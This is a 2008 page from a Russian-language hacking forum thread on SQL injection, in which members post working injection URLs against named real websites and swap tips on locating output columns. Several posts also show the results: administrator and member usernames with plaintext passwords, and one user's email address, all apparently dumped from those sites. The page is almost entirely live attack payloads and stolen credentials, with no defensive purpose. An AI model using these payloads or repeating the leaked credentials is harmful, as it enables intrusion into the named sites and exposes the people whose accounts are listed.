FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 565 из 1602

565

Опции темы

Поиск в этой теме

Опции просмотра

18.06.2008, 22:02

#urbaner

Новичок

Регистрация: 30.03.2008

Сообщений: 19

Провел на форуме:
95226

Репутация: 10

Отправить сообщение для #urbaner с помощью ICQ

Цитата:

http://www.kino.ru/cinema.php?id=10+union+select+1,2,3,4,5,6,7/*

Блин,не могу найти поля для вывода

P.S.Блин а де она,(1) в упор не вижу..

Последний раз редактировалось #urbaner; 18.06.2008 в 22:17..

18.06.2008, 22:13

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

#urbaner
{1},2,3,4,5,6

4.1.22-standard-log
u6635_1
u6635_1@localhost

18.06.2008, 22:26

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

#urbaner нужно переходит к несуществующим значениям параметра

http://www.kino.ru/cinema.php?id=-10+union+select+1,2,3,4,5,6,7/*
http://www.kino.ru/cinema.php?id=99999999999999+union+select+1,2,3,4, 5,6,7/*

или так

http://www.kino.ru/cinema.php?id=10+and+10=0+union+select+1,2,3,4,5,6 ,7/*

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

19.06.2008, 00:13

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

Отправить сообщение для Xszz с помощью ICQ

[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.columns/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.tables/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+mysql.user/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+dual/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+phpbb_users/*

19.06.2008, 12:27

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

Хотел было заказать себе домик в Голландии через это агентство, ну да ладно. =)

http://www.pandzoeker.nl/-housingonline/

Код:

http://www.pandzoeker.nl/-housingonline/view.php?id=15050+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80+from+users/*

Ник: otto
Пароль: victor1

Последний раз редактировалось ЛифчиС5СВ; 19.06.2008 в 12:30..

19.06.2008, 16:41

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

http://www.labtribo.ru/

Код:

http://www.labtribo.ru/live/news.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar)+FROM+users)--

admin:$lowh@nd$

19.06.2008, 17:20

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

sql-injection dozory.ru

PHP код:


		
			
http://day-watch.dozory.ru/services/exp/top_actors/

настройки(вверху справа)-
показывать в топах по 1' игроков
сохраняем и видим ошибку.

т.к. тему в разделе удалили, значит выкладываю здесь..Не пропадать же добру. Не зря ведь искал...

осталось только раскрутить. У меня так и не получилось.. в union дошёл до 30 полей....

Отследил работу скрипта, можно ещё таким запросом

PHP код:


		
			
http://day-watch.dozory.ru/services/exp/ajax_topactors.php?elem=alltop&date=?show_in_top=10%27%22

Последний раз редактировалось AFoST; 19.06.2008 в 18:09..

19.06.2008, 18:28

theli

Новичок

Регистрация: 29.05.2008

Сообщений: 12

Провел на форуме:
171038

Репутация: 11

Цитата:

Сообщение от AFoST

sql-injection dozory.ru

через пост там не получится, надоть через куки... прогнал скриптом ради интереса до сотни... что-то там не так

Последний раз редактировалось theli; 19.06.2008 в 18:34..

19.06.2008, 17:51

~~Petr~~

Banned

Регистрация: 10.06.2006

Сообщений: 938

Провел на форуме:
7792614

Репутация: 1223

http://www.oke.ru/xo4u.php?id=-42708+UNION+select+1,2,passw,4,5,6,7,8,9,10+FROM+c hausers+LIMIT+0,1/*

Тока пароль пустой

#10

19.06.2008, 19:07

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

vidsfree.net Porno

Цитата:

http://vidsfree.net/tvshows.php?mode=details&id=-1+union+select+1,concat_ws(0x3a,username,lastlogin ,password,email),3,4,5,6,7,8,9,10,11,12,13,14+from +admin_login/*

admin:merlot5009

http://vidsfree.net/admin

в админке ничего интересного

Цитата:

http://vidsfree.net/tvshows.php?mode=details&id=-1+union+select+1,concat_ws(0x3a,username,lastlogin ,password,email),3,4,5,6,7,8,9,10,11,12,13,14+from +member/*

adrianman:a103795:annessaybarra@yahoo.com